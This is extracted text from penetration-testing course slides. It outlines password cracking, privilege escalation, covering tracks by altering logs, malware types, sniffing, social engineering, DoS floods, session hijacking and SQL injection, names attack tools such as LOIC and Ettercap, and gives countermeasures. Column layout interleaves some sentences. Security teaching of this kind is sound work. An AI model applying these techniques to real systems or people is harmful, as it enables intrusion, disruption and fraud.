PsTools is a useful suite for both remote and local system

assessment and exploitation.
143
NetCat for Enumeration

Freeware utility

Commonly used for backdoor

utility

Can be used to push files from

one system to another

Can grab banners, do port scanning

and port enumeration, and
perform remote actions

144
What About Metasploit?
The Metasploit framework was
introduced as a research Metasploit was designed for
project by the well-known security research and assessments
security researchers H.D.
Moore and spoonm. Contains numerous exploits to be
used

Can target applications and many

operating systems

Is command line but also has web

interface

145
Summary
• Enumeration follows scanning.
• Enumeration seeks to reveal information from a
system.
• Enumeration is an active measure.
• Information can include usernames, group
information, printer data, and other data.

146
7: System Hacking

147
Gaining Access
•What is gaining access?
• Breaking passwords
• Opening up a system
• Can lead to further actions

148
Password Cracking
Passwords are the most widely used form of
The ability to crack authentication.
passwords is a Usernames and passwords are a commonly
required skill to you targeted item.
as a penetration Enumeration may have gathered usernames in
some cases.
tester as passwords
represent an Password cracking is used to obtain passwords.
effective way to gain Password cracking refers to a group of
access to a system. techniques.

It is an essential skill for penetration testers.

149
What Makes a Password Susceptible to Cracking?
Passwords are Passwords that contain letters, special characters, and numbers:
stud@52
intended to be Passwords that contain only numbers: 23698217
something Passwords that contain only special characters: &*#@!(%)
that is easy to Passwords that contain letters and numbers: meetl23
remember but Passwords that contain only uppercase or only lowercase:
POTHMYDE
at the same Passwords that contain only letters and special characters:
rex@&ba
time not easily Passwords
123@$4
that contain only special characters and numbers:

guessed or Passwords of 11 characters or less

broken.
150
Password Cracking Types
There are numerous
Passive Online • Sniffing techniques used to
reveal or recover a
password that you must
• Brute force explore, and each uses a
Active Online
• Guessing different approach that
can yield a password.
• Rainbow
Offline
tables Each method offers
• Social advantages and
Nonelectronic
engineering disadvantages that you
should be familiar with.
151
Passive Online
A passive online Passive attacks adopt a “sit
back and wait” attitude.
attack is any
attack where the Packet sniffers are a
common mechanism to
individual gather passwords.
Characteristics of
carrying out the passive online
process takes on Weak password protection
schemes are at risk.
a “sit back and
wait” attitude. Many protocols of older
varieties are vulnerable.
152
Protocols Vulnerable to Sniffing
There are Telnet and rlogin (remote login): Using these protocols,
anyone can access your keystrokes.
thousands of HTTP: This protocol sends usernames and passwords in
protocols that cleartext.
SNMP: This is like HTTP; it sends passwords in
allow people to cleartext.
communicate via
POP: This sends passwords in cleartext.
networks while
also being used FTP: This sends passwords in cleartext.
to hack into NNTP: This sends passwords in cleartext.
them.
IMAP: This sends passwords in cleartext.
153
Tools for Passive Attacks
A network sniffers monitors data
flowing over a network, which
can be a software program or a
hardware device with the
appropriate software or firmware
programming.
• Wireshark
• Network Miner
• Network Monitor
• Dsniff

154
Man-in-the-Middle
This type of attack takes place when two different parties
communicate with one another with a third party listening in.

Designed to listen in on the

communication between two parties
Can be completely passive if attacker
just listens to communication
Could become active attack if an
attacker takes over the session

Some protocols vulnerable to sniffing

155
Active Online
Attacks that fit into this category are those that
require direct interaction with a system in an
attempt to break a password.
• Guessing
• Malware

156
Password Guessing
Password guessing is a Pet’s
valid and somewhat name
effective form of
Best Spouse’s
obtaining a password. friend name

During this process an Bad passwords

attacker will attempt to
gain a password by Favorite Data of
using a piece of show birth
software designed to Phone
test passwords. #

157
Using Malware
In February 2005, Joe Lopez, a businessman from Florida, filed a suit
against Bank of America after unknown hackers stole $90,000 from his
Bank of America account. The money had been transferred to Latvia.
An investigation showed that Mr. Lopez’s computer was infected with a
malicious program, Backdoor.Coreflood, which records every keystroke
and sends this information to malicious users via the Internet.

Malware is a class of software with no beneficial

use.

158
Using Malware
• Keyloggers are
a good example
of malware.
• Keyloggers can
be used to gain
countless
pieces of
information.

159
Offline
• Rainbow tables
• Uses precomputed hashes to identify password

160
What Is a Rainbow Table?
Rainbow tables are the end result of a
process where every possible
combination of characters is generated
within certain limits.
• Reduces difficulty in brute-force
methods
• Generates hashes for every possible
password
• Takes time to create hash table
• Faster than other types of attacks
• Effective against LAN Manager systems

161
Privilege Escalation
Not every system Increasing access for
compromised account
hack will initially
provide an
Typically, breached
unauthorized user account will not have
broad privileges
with full access to the
Privilege escalation
targeted system. In Raising privileges to a
those circumstances, level where more
actions can take place
privilege escalation is
required. Can be vertical or
horizontal
162
Privilege Escalation Types
Privilege escalation is the process where the access that is
obtained is increased to a higher level where more actions
can be carried out. The reality is that the account accessed
typically will end up being a lower privileged one and
therefore one with less access.
• Vertical
• Raising the privileges of an account that has already
been compromised
• Horizontal
• Compromising one account and then another and
another, each with an increased level of access
163
Tools for Privilege Escalation

Active@ Password Changer

Trinity Rescue Kit

ERD Commander

Kali Linux

Parrot OS

Windows Recovery Environment (WinRE)

Windows Password Recovery

164
Opening a Shell
LAN Turtle is a remote access pen What LAN Turtle
testing tool enables is the
ability to
Housed with USB network adapter perform several
attacks such as
Allows opening of a remote shell on man-in-the-
a system
middle, sniffing,
With shell, open commands can be and many
transmitted to remote system others.

165
Running Applications
When an attacker is
executing applications on a
Backdoors
system, they are doing so
with specific goals in mind.
Crackers

Keyloggers

Malware

166
Covering Tracks

Eliminate or
Important step
Leave no trace alter logs, error
in removing
behind messages, and
evidence
files

More evidence
or tracks
means greater
chance of
being detected
167
Working with Log Files

Surgical
Disabling of May prevent removal of
Prevent leaving
auditing on a or slow entries in log
of information
system detection files is
possible

168
Alternate Data Streams
ADS was introduced into the Windows NTFS file system
starting in Windows NT 3.1. This was implemented in
order to allow compatibility with the Macintosh
Hierarchical File System (HFS).

Feature of NTFS file system

Allows for compatibility with Macintosh file
system
Stores data in a nearly undetectable resource
fork
Tough to reveal presence of data stream

Special software required to detect files

169
Summary
• What the process looks like
• Steps to take
• Tools to use
• Information to be obtained

170
8: Malware

171
An Overview of Malware
Malware has quickly Malware is an umbrella
become one of the term for several forms of
leading problems bad software.
plaguing modern Malware has become more
technology, with several destructive and stealthy.

Malware
million new forms of
malware created every It has evolved to more
readily steal information.
year (by some estimates
around 1,200 new It may be useful, but it’s
potentially risky to use
pieces are created each during a test.
hour). 172
Forms of Malware
Malware is anything that Viruses
consumes resources and
time while providing Worms
nothing in return and Trojan horses
uses those resources to Rootkits
perform some operation
that is counter to the Spyware
system owner’s best Adware
interests. Ransomware
173
Authors of Malware

Skilled
Criminals
programmers

Casual users Students

174
A Closer Look at the Creators

Students and Younger

newbies computer users

Professional
and Researchers
experienced and testers
programmers 175
Virus Family Tree
When talking about MBR virus
viruses, it is important File infector virus
that you have an
Macro virus
understanding that not
all viruses are created Service injection viruses
equal, and in fact there Multipartite
is a whole family of Polymorphic
virii.
Encrypted
176
What Is a Worm?
Unlike their virus Self-propagating
malicious code
cousins that
require a host Does not need user
program to start input
their dirty work, Requires a system
Worm
worms just need a to be vulnerable
system to be
Replicates and
vulnerable to start spreads
their own self-
replicating process. Spreads rapidly
177
Worm Example: Slammer
Doubled every 8.5 seconds for first 3 minutes
of life

Ran 55 million scans at peak

75,000 infections in ten minutes

Smaller in size than previous worms

Generated random IP addresses

Preyed on SQL Server systems

178
Spyware
This type of Torrent sites

software operates
Instant messaging
in the background
and out of a user’s Email
attachments

Forms
sight quietly
collecting Physical access

information and Browser add-ons

transmitting it to its
creator. Websites
179
Trojan Horses
Stealthily
Host used as
drops off
carrier
payload

Relies on
Host carries
social
malicious
engineering
payload Trojan to activate
horse

By using another program as its carrier, it relies on what is

known as social engineering, or taking advantage of human
behavior, to carry out its actual infection.
180
What Do Trojans Do?
Because Trojans are
so versatile and can Create backdoors

go unnoticed, their
Spy
popularity has
exploded, and Steal passwords
they've become the
malware of choice Use your computer as a zombie
for many online
criminals. Send SMS messages
181
Summary
• Types of backdoors
• Type of Trojans
• Categories of malware
• Malware creation kits
• Importance of keyloggers

182
9: Sniffers

183
What Is Sniffing?
Sniffers are a • Is the act of viewing information
broad category as it flows over the network
that • Can be performed with
hardware or software
encompasses
• Preys on vulnerable networks
any utility that and protocols
has the ability to • Passwords (from email, the
perform a Web, SMB, FTP, SQL, or
packet-capturing Telnet)
function. • Email text
184
Law Enforcement and Sniffing
Lawful interception Lawful interception is legally
(LI) is defined as sanctioned access to network data
legally accessing Must have authority in pursuit of
communications evidence or analysis
and network data
such as telephone Regulated by the law
calls or email
messages. Sometimes called wiretapping

185
Vulnerable Protocols
SMTP NNTP
HTTP POP

rlogin FTP

Insecure
Telnet IMAP
Protocols

How successful you are at the sniffing process depends

on the relative and inherent insecurity of certain
network protocols.
186
A Quick Overview

Packet sniffing, or Packet sniffing can capture any traffic

packet analysis, is flowing over a network.
the process of Packet sniffers are commonly
capturing any data used for troubleshooting
passed over the purposes.
local network and Many tools are available to
looking for any perform the process.
information that Passive form is just like
may be useful. eavesdropping on a conversation.
187
What’s Required to Sniff?

Hardware in the form of network adapters

Drive program or the core sniffing program

Buffer to temporarily store the results of a sniff

Packet analysis capability to interpret results

188
A Selection of Sniffing Tools

Sniffers

Wireshark Tcpdump Omnipeek Dsniff Etherape

Windump

189
Types of Sniffing

• Sniffing when a hub is

present
Passive
• Restricted to a network
Sniffing
segment
• Tends to be stealthier

• Sniffing when a switch is

present
Active
• Attempts to bypass
Sniffing
switch
• Less stealthy

190
What Are Hubs?

Central connection point for networks

Broadcast traffic received out through every port

Perform little to no filtering of traffic

Slower and cheaper than switches

Not common in modern networks

191
Network Switches
• Switches
• Perform examination of each packet
• Look at source and destination of each packet
• Use information to direct traffic
• Separate network into collision domains
• Isolate network nodes from one another
When a packet is received by the switch, the
destination and source addresses and compares them
to a table of network segments and addresses.
192
Wireshark
• As of this writing, Wireshark reigns supreme as perhaps the best
sniffer on the market.
• Wireshark has been around for quite a while, and it has proven its
worth time and time again.
• Wireshark is natively available on Windows, Mac OS X, and Linux.

As of

193
tcpdump
tcpdump is an open source
network utility that is freely A command-line
available under the BSD packet sniffer
license. Intercepts traffic
in TCP/IP format
Can send output
to file
Known as being very
fast and efficient
194
Active Sniffing Close-Up
When sniffing is performed in a switched network, it is called
active sniffing.
Active sniffing means the network
has a switch instead of a hub.

The switch actively regulates traffic.

The switch uses Address Resolution

Protocol (ARP) to direct traffic.

The switch maintains an ARP table

in memory to track MAC addresses.

195
MAC Flooding
A switch keeps track of MAC addresses received by writing them
to a content addressable memory (CAM) table. If a switch is
flooded with MAC addresses, it may easily overwhelm the
switch’s ability to write to its own CAM table.
Involves flooding the switch
with numerous requests
Overloads the CAM table in
the switch
Causes switch to fail and act
like a hub
196
ARP Spoofing

Denial of service

Man-in-the-
middle/sniffing

MAC flooding

The ARP protocol is a simple and efficient protocol, but one

drawback is its lack of authentication, and as a result, there is
no way to verify the IP to MAC address mapping.
197
MAC Spoofing
MAC spoofing is a simple concept in which an attacker (or pen
tester) changes their MAC address to the MAC address of an existing
authenticated machine already on the network.

Fakes the MAC address of an

existing client

Allows a system to
impersonate another
Can allow for the bypass of
any mechanism that uses a
MAC address to control traffic
198
SMAC

199
Sniffing Countermeasures
Use a hardware-switched network for the most sensitive
portions of your network.
Implement IP DHCP snooping on switches to prevent ARP
poisoning and spoofing attacks.
Implement policies preventing promiscuous mode on network
adapters.
Be careful when deploying wireless access points, knowing
that all traffic on the wireless network is subject to sniffing.
Encrypt your sensitive traffic using an encrypting protocol
such as SSH or IPsec.
200
Summary
• Sniffing allows the interception of network traffic.
• Sniffing targets vulnerable or insecure network
protocols.
• Sniffing uses packet sniffers to gather traffic.
• Sniffing comes in active and passive modes.
• Sniffing can be impacted by hubs and switches.

201
10: Social
Engineering

202
How Do Social Engineers Work?

Threats Ignorance

Trust Scarcity

Moral Human
Urgency
obligation element

203
Why Social Engineering Works
Social engineering is effective for a number of reasons,
each of which can be remedied or exploited depending on
whether you are the defender or the attacker.
• Lack of a technological fix
• Insufficient security policies
• Difficult detection
• Lack of training

204
Example of Social Engineering
• An unexpected phone call from your Internet service
provider (ISP) or Microsoft
• Tells you you’re either in danger (a virus or outdated
software) or missing something valuable
• Why it works:
• Exploits trust
• Exploits buzzwords
• Exploits scarcity

205
Example of Social Engineering
In the next phase, the attacker gains the user’s trust,
convinces the user a technical service is being provided,
and requires payment via credit card.
• Exploits lack of technical know-how
• Interacts with victim to build trust
• Acts as if providing a legitimate service
• Uses charade to obtain financial information

206
Example of Social Engineering

Leverages
Exploit fear target’s
ignorance

Stresses
Presents
urgency to
image of
force
authority
reaction

207
Signs of an Attack
• Use (or abuse) of authority
• Inability to provide contact information
• Making informal requests
• Excessive name dropping
• Excessive use of praise
• Discomfort when questioned

208
Social Engineering Phases
Social engineering, Use recon to gain details about a target.
like the other
attacks we have
explored, consists Select a specific individual or group who may have
what you need to get closer to the desired target.
of multiple phases,
each designed to
Forge a relationship with the intended victim
move the attacker through interaction.
one step closer to
the ultimate goal.
Exploit the relationship with the victim.

209
Impact of Social Engineering
After experiencing a
Economic loss
successful social
engineering attack,
businesses say they suffer Terrorism
from business disruption,
lost productivity, and lost Loss of privacy
revenue and need to undo
damage or conduct a Lawsuits and arbitrations
forensic analysis.
Temporary or permanent closure
210
Targets of Social Engineering
An attacker will look for targets of opportunity or
potential victims who have the most to offer.
• Receptionists
• Help desk personnel
• System administrators
• Executives
• Users

211
Dangers of Social Networking

Personal information
Photos
Location information
Friend information
Business information
Likes and dislikes
212
Information Found on Social Networking
Social networking Location information
has made the
attacker’s job Personal data
easier because of Company information
the volume of
Photos of private or secure
data and facilities
personal
Information on co-workers
information
available. Event or vacation information
213
Countermeasures Against Social Engineering

Avoid mixing personal and professional information.

Always verify contacts, and don’t connect to just anyone online.

Avoid reusing passwords.

Don’t post just anything online.

Avoid posting personal information.

214
Countermeasures and Recommendations
Educate employees against publishing any
To avoid identifying personal information online.
problems with Encourage or the use of nonwork accounts for use
social with social media.
Educate employees on the use of strong
networking, a passwords.
company should Avoid the use of public profiles that anyone can
exercise many view.
Remind users that once something is put online, it
different never goes away.
countermeasures
Educate employees on the use of privacy.
Instruct employees on the presence of phishing
scams.
215
Internet-Based Social Networking
Many threats will Malware is used as an all-inclusive term for
viruses, spyware, keyloggers, and worms.
continue to pose
Shoulder surfing is when one party is able to
problems for those look over another’s shoulder, also called
using the Internet, spying.
and unless you opt Eavesdropping involves listening in on
communications.
to stop using this
Dumpster diving seeks to collect information
resource, you must from disposal points.
address the
Phishing uses a bogus email to bait you to
threats. click a link or visit a malicious website.
216
Internet Social Engineering Countermeasures

Exercise caution on unsecured wireless networks.

Be careful accessing sensitive information in a public place.

Don’t save personal information casually on shopping websites.

Be careful about posting personal information.

Keep your computer personal.

217
Signs of Identity Theft
One of the You see withdrawals that are unexplained.
most prominent
You don’t get your bills or other mail.
and rapidly
evolving threats Merchants refuse your checks.
is identity theft, Debt collectors call you about debts that aren’t
yours.
which falls You find unfamiliar accounts or charges on your
under the credit report.
Medical providers bill you for services you didn’t
heading of use.
social You get notice that your information was
compromised by a data breach.
engineering. 218
Protection Against Identity Theft

Identity Theft Countermeasures

Formulate
Examine Be careful of Avoid using
your own
requests for applications standard
questions
personal that require security
where
information registration questions
possible
In many cases, the only thing standing between someone and your
money is a four- to six-digit number or a word or combination of
words.
219
Finding Out About Yourself

Social Networking Search Engines

Spokeo Intellius
ZabaSearch
Facebook
People Search
LinkedIn Shodan
220
Summary
•What social engineering is
•How social engineering works
•Countermeasures

221
11: Denial of
Service

222
Goals of Denial-of-Service Attacks

Goal is to deny or disrupt use of resources

Unavailability of a resource

Loss of access to a website

Slow performance

Increase in spam emails

223
Case Study: WikiLeaks
• After Julian Assange’s WikiLeaks
release of government information,
many financial institutions stopped
serving WikiLeaks.
• Hackers targeted these institutions’
websites with DoES attacks, making
them unavailable to customers.
• The companies ultimately hardened
their sites, but hackers had shown they
could disrupt major targets.

224
Denial-of-Service Goals and Motivations
• Web server compromise
• Back-end resources
• Network or computer specific
• Extortion via a threat of a DoS attack
• Turf wars and fights between online gangs
• Anticompetition business practices
• Punishment for undesired actions
• Expression of anger and criticism
• Training for other attacks
• Self-induced
• No reason at all 225
Types of Attacks
A successful DoS • Type #1: Volumetric attacks
attack is a highly • 65% of attacks
noticeable event that • Eats resources
makes it a popular • Hard to mitigate
weapon of choice for • Type #2: Application-layer attacks
hacktivists, cyber • 17% of DDoS attacks.
vandals, extortionists, • HTTP flood is a form
and those looking to
make a point.

226
Forms of Denial of Service
Service request floods
SYN attack/flood
ICMP flood attack
Ping of death
Teardrop
Smurf and/or fraggle
Land
227
SYN Floods at Work
The basic idea behind SYN flooding • Attacker floods server with
utilizes the three-way handshake SYN packets with spoofed
that begins with a user sending a source address
“synchronize” (SYN) message to the • Server responds with
server. SYN/ACK reply to fake
source address
• No ACK reply server must
wait until half-open
connection times out
• Prevents legitimate users
from accessing the server

228
SYN Flood Countermeasures

Use firewalls in order to withhold/insert packets

Modify the size of the server’s half-open

connection queue to a larger size

Decrease the queue’s timeout period

Limit the number of half-open connections from a

single IP
229
Smurf Attack
A misconfigured router forwarding
the broadcast request to the
Attacker subnet

Machines that will respond to this

ICMP broadcast request

Smurf Note that there is not much

a victim can do about this
Victim Amplifier attack since the link is
simply overloaded with
packets.
230
Anatomy of a Smurf Attack

231
Steps Leading to a Smurf Attack
•Huge numbers of ICMP requests are sent to the victim’s IP
address.
•The source destination IP address is spoofed.
•The hosts on the victim’s network respond to the ICMP
requests.
•This creates a significant amount of traffic on the victim’s
network, resulting in consumption of bandwidth and
ultimately causing the victim’s server to crash.

232
Countermeasures for Smurf Attacks

The router should be configured so that it does

not forward directed broadcasts onto networks.

Servers should be configured to not respond to

a directed broadcast request.

The victim’s ISP must take some actions to

block ICMP Echo Reply floods.
233
Fraggle Attack
• Floods a target with UDP packets
• Targets packets toward a victim
• Uses intermediate network to amplify attack
• Much like smurf attack but based on UDP

Note that a fraggle attack is a variation of a smurf

attack where an attacker sends a large amount of UDP
traffic to an IP broadcast address, with the intended
victim’s spoofed source IP address.

234
Ping of Death

Uses IP packet fragmentation techniques to crash remote systems

Transmits large ICMP packets (> 65,535 bytes) to victim host

IP packet fragmented into Ethernet frames

When fragments are reassembled, large size causes crash or

lock-up

Modern systems typically not vulnerable

235
Teardrop Attacks
In the teardrop attack, the attacker’s Exploits fragmentation process
IP address puts a confusing offset
value in the second or later fragment. Specifies illogical offsets
If the receiving operating system does
not have a plan for this situation, it Receiving system will reassemble
packet
can cause the system to crash.
Illogical offsets can cause system crash

Older systems tend to be targets

Newer systems usually do not have this

problem

236
Land Attack
Looks similar to Syn-Flood
Sometimes referred to as “infinite loop”
attack
Crashes a system by sending it a forged
packet
Packet has source and destination set to the
victim’s IP address
Makes system think it is sending itself a
message
Can crash or slow a system

Newer systems not vulnerable

237
Permanent Denial of Service
By exploiting Also known a Permanent Denial of Service
(PDoS)
security flaws or
misconfigurations, Phlashing is a form
permanent denial
Running a highly virtualized environment
of service (PDoS)
can destroy the Organizations highly dependent on IoT
firmware and/or
basic functions of Organizations with centralized security
gateways
system. Organizations that are considered critical
infrastructure
238
A Word About Buffer Overflows
A buffer overflow occurs
Occurs when a program
when a program or process attempts to store data in
tries to store more data in a memory
buffer (temporary data Can occur because of
storage area) than it was programming errors
intended to hold.
Can be uncovered in any
software

Usually are patched when

discovered

239
DDoS Attacks
A standard DoS Attacker compromises multiple hosts
attack can be
launched from a Hosts are used to execute the attack
single malicious
client, whereas a DoS is a one-on-one, smaller-scale attack

DDoS attack uses a

Compromised systems are bots or zombies
distributed group
of computers to Bots are commonly created with Trojans
attack a single
target. Result is loss of access to a given resource
240
Defending Against DoS
Disabling unnecessary services
Using anti-malware
Enabling router throttling
Using a reverse proxy
Enabling ingress and egress filtering
Degrading services
Absorbing the attack
241
DDoS and DoS Tools
LOIC, HOIC
XOIC
HULK
UDP Flooder
RUDY
ToR’s Hammer
Pyloris
OWASP Switchblade
DAVOSET
GoldenEye HTTP DoS Tool
THC-SSL-DOS
DDOSIM: Layer 7 DDoS Simulator

242
Summary
• Denial-of-service attacks
• How denial-of-service attacks work

243
12: Session
Hijacking

244
What Is Session Hijacking?
Session hijacking,
also known as TCP Session hijacking is roughly a stolen
session hijacking, is session.
a method of taking A session represents a
over a web user connection.
session by
Session hijacking incorporates the
surreptitiously same concepts as sniffing.
obtaining the
session ID and It can be used to take over
authenticated sessions.
masquerading as
the authorized user. 245
Understanding Session Hijacking
No account lockout for invalid session IDs
Insecure handling
Weak session ID generation algorithm
Indefinite session expiration time
Cleartext transmission
Small session IDs

246
Spoofing vs. Hijacking
Spoofing occurs when an attacking party impersonates an identity.
In hijacking, the attacker takes over an existing active session.
Sniffing

Monitoring

Session desynchronization

Session ID prediction

Command injection
247
Types of Session Hijacking

Active Passive

An attacker hijacks a An attacker hijacks a

session session

Hijacks the session Hijacks the session

Injects commands Monitors and records

into the session traffic
248
TCP and the Three-Way Handshake
TCP establishes connections Ports can be TCP or UDP.
and then verifies that each
and every packet makes it to
TCP is a connection-oriented protocol.
their destination in the right
order. To accomplish this, TCP
The three-way handshake is used to establish a
uses the three-way connection.
handshake.
The completion of the three-way handshake is
used before sending packets.

The three-way handshake does not handle

security.

TCP also provides sequence numbers for

reassembly of data.
249
TCP Flags
SYN: Used to initiate a connection between two
different hosts in order to facilitate communications.
ACK: Used to acknowledge the receipt of a packet of
information.
URG: States that the data contained in the packet
should be processed immediately.
PSH: Instructs the sending system to send all buffered
data immediately.
FIN: Tells the remote system that no more information
will be sent. In essence this is gracefully closing a
connection.
RST: A reset packet that is used to reset a connection.

250
TCP Sequence Numbers
Sequence number describes order
of packets

Incremented during transmission

of each packet

Starts from an initial sequence

number (ISN)

32-bit number

251
Session Hijacking and Web Applications
Session hijacking at the application level focuses on gaining access to a
host by obtaining legitimate session IDs from the victim.

Embedded as a
hidden field

Embedded in a
Cookies
URL

Session
IDs

252
Application-Level Hijacking
Predicting session tokens
• /app/spo22022005131020
Session sniffing • /app/spo22022005141520
• /app/spo22022005171126
• /app/spo22022005213111

Man-in-the-browser attack
• Browser helper objects
Man-in-the-middle attack • Extensions
• API hooking
• JavaScript
253
Cross-Site Scripting
Cross-site • The attacker stores malicious code in the
vulnerable page.
scripting (XSS) is • The user authenticates in the application.
Stored attacks
a type of attack • The user visits a vulnerable page.
that can occur in • Malicious code is executed by the user’s
browser.
many forms, but
in general it • It is in the form of an email or via a different
web server.
occurs when data • It occurs when a party injects executable
Reflected
of some type attacks
code within an HTTP response.
• The code is not persistent and is not stored.
enters a web • It leverages JavaScript, VBScript, or other
application scripting languages where appropriate.
through an
untrusted source. 254
Session Fixation
A session ID is sent to a victim in a
malicious hyperlink for the victim to
click.
The victim is tricked into authenticating
to a target using an attacker-created
login form.
The attacker uses injection to insert
malicious code in the hyperlink.
The HTTP header response uses the
server to fix the session ID in the
victim’s browser.

255
Key Concepts
Blind hijacking

IP spoofing

Source routing

DNS spoofing

ARP cache poisoning

256
Network Session Hijacking
• Blind hijacking
• IP spoofing
• Source routing
• DNS spoofing
• ARP cache poisoning
• Desynchronizing the connection

257
Network Session Hijacking
Blind hijacking

IP spoofing

Source routing

DNS spoofing

ARP cache poisoning

Desynchronizing the connection

258
TCP Session Hijacking
Sniff the traffic between the victim machines.

Predict the sequence numbers of the packets

traversing the network.

Perform a DoS on the victim’s machine, or reset

their connection.

Start injecting packets into the server, imitating

the authenticated client.
259
Man-in-the-Middle (MitM)
Once attackers are in the middle of the connection via a technique
such as ARP poisoning, they can monitor or manipulate traffic.
• PacketCreator
Network • Ettercap
Level • Dsniff
• Cain & Abel
• OWASP WebScarab
• Paros Proxy
Application • Burp Suite
Level • ProxyFuzz
• Odysseus Proxy
• Fiddler
260
Defensive Countermeasures
Encryption is effective against hijacking.

Use an IDS to detect network anomalies.

Check and filter for spoofed information.

Be aware of web browser vulnerabilities.

Implement stronger authentication systems.

Use technologies such as IPsec and SSL.

261
Summary
•What is TCP or session hijacking?
•How is session hijacking performed?
•Different formats of session hijacking
•Active or passive session hijacks
•Results of a successful attack

262
Web Servers and Applications

Chapter 13

263
13: Web Servers
and Applications

264
Client and Server
Server administrators

Network
administrators

Roles
End users

Application
administrator

Application
developer
265
A Closer Look at Web Servers
Web server delivers content over HTTP or other protocols.

Files are delivered in response to requests.

Web servers can support different types of content.

Multiple web server platforms exist from different vendors.

The top three popular web servers are Apache, Internet

Information Services (IIS), and nginx.
266
Apache for Linux and UNIX
• Authentication
• SSL/TLS support
• Proxy support
Security
• URL rewriter
features
• HTTP request filtering
• Intrusion detection
• Enhanced logging
• Python and Perl support
Application
• PHP
support
• Compression support
267
Microsoft Internet Information Services (IIS)

• Certificate support
Security
• Authentication support
features
• Security support and management

• Process management
Application • Server-side language
development • Database support
• Protocol listeners

Compatibility • Support for legacy technologies

268
Web Applications
A web application is
software that is Browser
based
installed on top of a
web server and is
designed to respond to
requests, process Types
information, store
information. Mobile Client
apps based
269
Client and Server Web Applications
The server application is on the web server.
A server
application is The client is a web browser or web-
hosted on a web enabled application.
server and is Information is stored on the server.
designed to be
accessed remotely Processing is done on the server.
via a web browser
or web-enabled The end result is delivered to the user.
application.
Applications can be made for one platform.
270
Cloud Services

Infrastructure as a Service
The cloud is a model (IaaS)
for creating shared
resources that can Platform as a Service
be dynamically (PaaS)
allocated and shared
on demand. Software as a Service
(SaaS)

271
A Closer Look at Web Applications
• Presentation layer
• Logic layer
• Data layer

All of these layers depend on the technology

brought to the table in the form of the World
Wide Web, HTML, and HTTP.

272
What Is a Cookie?
Cookies are used to store data.

The file holds state information.

Information can be exposed to a hacker.

Insecure cookies could allow theft.

It’s a commonly used technique.

273
Pieces of the Web Application Puzzle

Authentication Application
Web server
process content
Session
tracking
Login
Data access
Permissions
Data store
Logout
Logic

274
Common Problems with Web Applications
• Flawed Web Design
• Too much revealed in code
• Presence of server information
• Presence of connection information
• Buffer Overflow
• Software-based issue
• Common vulnerability
• Can cause numerous issues

275
Other Attacks Against Web Applications
• Denial-of-service attack
• Distributed denial-of-service attack
• Ping or ICMP flooding attack
• Smurf attack
• SYN flooding
• Fragmentation attack

276
Banner Grabbing
Banner grabbing is an
activity that is used to
determine information
about services that are
being run on a remote
computer.

• Banner grabbing is used to identify a system and services.

• It retrieves information from open ports and services.
• Services respond to banner grabs with application-specific
information.
• It can use Telnet of SSH to perform this task. 277
Error Messages
• May reveal too much
information
• Should be suppressed
or sanitized
• Detailed messages
should be accessible
only in development
• Custom error message
pages may be a solution

278
Common Flaws and Attack Messages
May be caused by
Misconfiguration
inexperience

Database
manipulation

Database
corruption
Input validation
Buffer overflows

Inconsistent data
279
Cross-Site Scripting
Cross-site scripting (XSS) is a type of attack that can occur in
many forms, but in general it occurs when data of some type
enters a web application through an untrusted source.
• The attacker stores malicious code into the vulnerable page.
Stored • The user authenticates in the application.
attacks • The user visits a vulnerable page.
• Malicious code is executed by the user’s browser.

• This takes the form of an email or via a different web server.

• This occurs when a party injects executable code within an
Reflected HTTP response.
attacks • Code is not persistent and is not stored.
• It leverages JavaScript, VBScript, or other scripting languages
where appropriate.
280
Coding and Design Flaws

Unvalidated Redirects and

Insecure Logon Systems
Forwards

Entry of an invalid user ID

Caused by bad input with a valid password
validation
Entry of an valid user ID
with an invalid password
Sends user to untrusted
location Entry of an invalid user ID
and password

281
Scripting Errors
Upload bombing

Poison null byte attack

Scripting issues Default scripts

Sample scripts

Poorly written or questionable

scripts
282
Cookie Issues

Secure

Expires HttpOnly
Cookie

Path Domain

283
Session Hijacking and Web Applications
Session hijacking at the application level focuses on gaining
access to a host by obtaining legitimate session IDs from the
victim.
Embedded as a
hidden field

Embedded in a
URL Cookies

Session IDs

284
Summary
• Definition of a web server
• Definition of a web application
• Can take many forms
• Process and store data on server

285
14: SQL Injection

286
What Is SQL Injection?
SQL injection is where a database
SQL injection is typically a result
is attacked using a query
of flaws in an application.
language.

Attackers can execute arbitrary

The goal of attacks is to access
SQL commands through the web
information in a database.
application.

The usual cause of this type of

flaw is improper or absent input
validation.
287
Results of SQL Injections
Identity spoofing

Alteration of data

Escalation of privileges

Denial of service

Data extraction

Destruction of data

Altering transactions
288
Web Applications
A web application is
software that is installed Browser
on top of a web server based
and is designed to
respond to requests,
process information,
and store information. Types

Mobile Client
apps based
289
Client and Server Web Applications
A server application The server application is on the web server.
is hosted on a web The client is a web browser or web-enabled
server and is application.
designed to be
Information is stored on the server.
accessed remotely
via a web browser Processing is done on the server.
or web-enabled
application. The end result is delivered to the user.

Applications can be made for one platform.

290
Server-Side vs. Client-Side Technology
• Database
• Oracle
• SQL Server
• IBM DB2
• MySQL
• Development Languages
• ASP
• ASP.NET
• PHP
• JSP
• Ruby on Rails
291
The Shape of Databases

Database Types

Object-
Relational Distributed
Oriented
Database Database
Database
For all of its complexities, a database can be described as simply
a hierarchical, structured format for storing information for later
retrieval, modification, management, and other purposes.
292
The Structure of Web Applications

Presentation
Logic Layer Data Layer
Layer

All of these layers depend on the technology brought to the

table in the form of the World Wide Web, HTML, and HTTP.

293
Pieces of the Web Application Puzzle

Authentication Application
Web Server
Process Content

Session
Tracking
Login
Data Access
Permissions
Data Store
Logout
Logic
294
Common Problems with Web Applications
• Flawed Web Design
• Too much revealed in code
• Presence of server information
• Presence of connection information
• Buffer Overflow
• Software-based issue
• Common vulnerability
• Can cause numerous issues

295
Error Messages
May reveal too much
information

Should be suppressed or
sanitized
Detailed messages should
be accessible only in
development
Custom error message
pages may be a solution

296
Common Flaws and Attack Messages
• Misconfiguration
• May be caused by inexperience
• Input validation
• Database manipulation
• Database corruption
• Buffer overflows
• Inconsistent data

297
Locating a Target

Google hacking is effective.

Customize searches to look for clues.

Look for items such as logon pages.

Look for pieces such as connection strings.

Look for error messages.

298
SQL Injection Countermeasures

Avoid the use of dynamic SQL.

Perform maintenance on the server regularly.
Deploy intrusion detection systems.
Harden a system to include the OS and database.
Exercise least privilege.
Ensure that applications are well-tested.
Avoid default configurations and passwords.
Disable error messages in production.

299
Summary
• SQL injection
• Steps for performing SQL injection
• SQL injection techniques
• SQL injection in Oracle
• SQL injection in MySql
• Attacking SQL servers
